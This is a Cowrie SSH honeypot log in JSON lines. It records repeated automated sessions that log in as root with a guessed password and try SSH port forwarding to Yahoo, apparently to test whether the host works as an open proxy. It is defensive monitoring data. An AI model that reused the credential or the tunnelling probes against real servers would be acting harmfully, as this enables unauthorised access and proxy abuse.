{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":3121,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3121","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.781777Z","session":"523eb476e5f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.829467Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.878035Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50075,"dst_ip":"1.2.3.4","dst_port":22,"session":"99f9d5f085a8","protocol":"ssh","message":"New connection: 213.209.150.239:50075 (1.2.3.4:22) [session: 99f9d5f085a8]","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.933716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.934411Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.991283Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.273686Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18291,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18291","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.331183Z","session":"99f9d5f085a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.387964Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":17886,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17886","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.543057Z","session":"99f9d5f085a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.599851Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.657315Z","src_ip":"213.209.150.239","session":"99f9d5f085a8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50139,"dst_ip":"1.2.3.4","dst_port":22,"session":"a58d0ed71d62","protocol":"ssh","message":"New connection: 213.209.150.239:50139 (1.2.3.4:22) [session: a58d0ed71d62]","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.703235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.704238Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.751139Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:55.985668Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":4650,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:4650","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.034634Z","session":"a58d0ed71d62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.081850Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":23586,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23586","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.217515Z","session":"a58d0ed71d62"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.265064Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.312765Z","src_ip":"213.209.150.239","session":"a58d0ed71d62"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50188,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e88b833ff81","protocol":"ssh","message":"New connection: 213.209.150.239:50188 (1.2.3.4:22) [session: 1e88b833ff81]","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.359263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.360357Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.407580Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.642837Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15308,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15308","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.690914Z","session":"1e88b833ff81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.738199Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":25350,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25350","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.873574Z","session":"1e88b833ff81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.920819Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:56.969159Z","src_ip":"213.209.150.239","session":"1e88b833ff81"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50270,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fca3eae5854","protocol":"ssh","message":"New connection: 213.209.150.239:50270 (1.2.3.4:22) [session: 3fca3eae5854]","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.024835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.034878Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.081807Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.363735Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22728,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22728","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.421108Z","session":"3fca3eae5854"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.477814Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29609,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29609","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.630965Z","session":"3fca3eae5854"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.687507Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.746294Z","src_ip":"213.209.150.239","session":"3fca3eae5854"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50340,"dst_ip":"1.2.3.4","dst_port":22,"session":"470b44325d5f","protocol":"ssh","message":"New connection: 213.209.150.239:50340 (1.2.3.4:22) [session: 470b44325d5f]","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.801690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.802611Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.859069Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":35814,"dst_ip":"1.2.3.4","dst_port":22,"session":"dca399acc033","protocol":"ssh","message":"New connection: 27.112.78.170:35814 (1.2.3.4:22) [session: dca399acc033]","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.953887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:57.955071Z","src_ip":"27.112.78.170","session":"dca399acc033"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.141752Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13658,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13658","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.199388Z","session":"470b44325d5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.222476Z","src_ip":"27.112.78.170","session":"dca399acc033"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.255978Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30518,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30518","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.411040Z","session":"470b44325d5f"}
